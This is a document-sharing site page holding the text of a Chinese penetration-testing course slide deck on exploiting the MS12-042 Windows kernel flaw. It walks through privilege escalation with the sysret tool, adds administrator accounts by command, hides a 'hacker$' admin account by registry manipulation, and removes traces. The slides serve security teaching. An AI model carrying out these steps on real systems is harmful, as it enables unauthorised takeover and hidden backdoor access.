网络渗透与防护 课中学习 Win漏洞-12042-ppt(PPT).pptxVIP

网络渗透与防护 课中学习 Win漏洞-12042-ppt(PPT).pptx

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
技能点:MS12-042漏洞利用By王隆杰MS12-042漏洞简介存在于 Windows XP 和 Windows Server 2003 的所有 32 位版本、Windows 7(用于基于 x64 的系统)以及 Windows Server 2008 R2(用于基于 x64 的系统)该漏洞是Windows 内核中的漏洞,可能允许特权提升参见微软官网/library/security/ms12-042MS12-042漏洞简介Windows用户模式调度程序( Windows User Mode Scheduler )存在内存破坏漏洞用户模式调度程序处理系统请求时存在权限提升可能,成功利用后可导致在内核模式中运行任意代码。MS12-042漏洞利用实验步骤01普通用户登录Windows Server 2008 R2系统02使用漏洞利用工具sysret提权03添加管理员用户temp04添加新的用户hacker$,并隐藏该用户使用漏洞利用工具sysret提权Usage : sysret.exe option argumentoption :-pid pid-exec executable提权有两种途径:使用tasklist命令找出cmd或者powershell进程号,使用 sysret –pid XXXX命令把进程提权。因可能导致蓝屏,不建议采用。使用sysret –e cmd.exe命令进行提权提权后添加管理员用户whoami确认是否提权成功net user temp Qaz123!@# /addnet localgroup administrators temp /add以上添加temp用户,并把用户加到管理员组添加隐藏管理员用户用新添加的temp用户登录windowsnet user hacker$ Qaz123!@# /add以上添加hacker$用户,并把用户加到管理员组,使用net user命令看不到该用户,但在“计算机管理”界面中能看到隐藏新添加的管理员用户使用regedt32导出hacker$的注册表项在“计算机管理”界面中删除hacker$用户使用regedt32导回hacker$的注册表项则hacker$用户被隐藏了打扫战场改注册表:使用hacker$用户登录在“计算机管理”界面中删除temp用户

您可能关注的文档

文档评论(0)

WanDocx + 关注
实名认证
文档贡献者

大部分文档都有全套资料,如需打包优惠下载,请留言联系。 所有资料均来源于互联网公开下载资源,如有侵权,请联系管理员及时删除。

1亿VIP精品文档

相关文档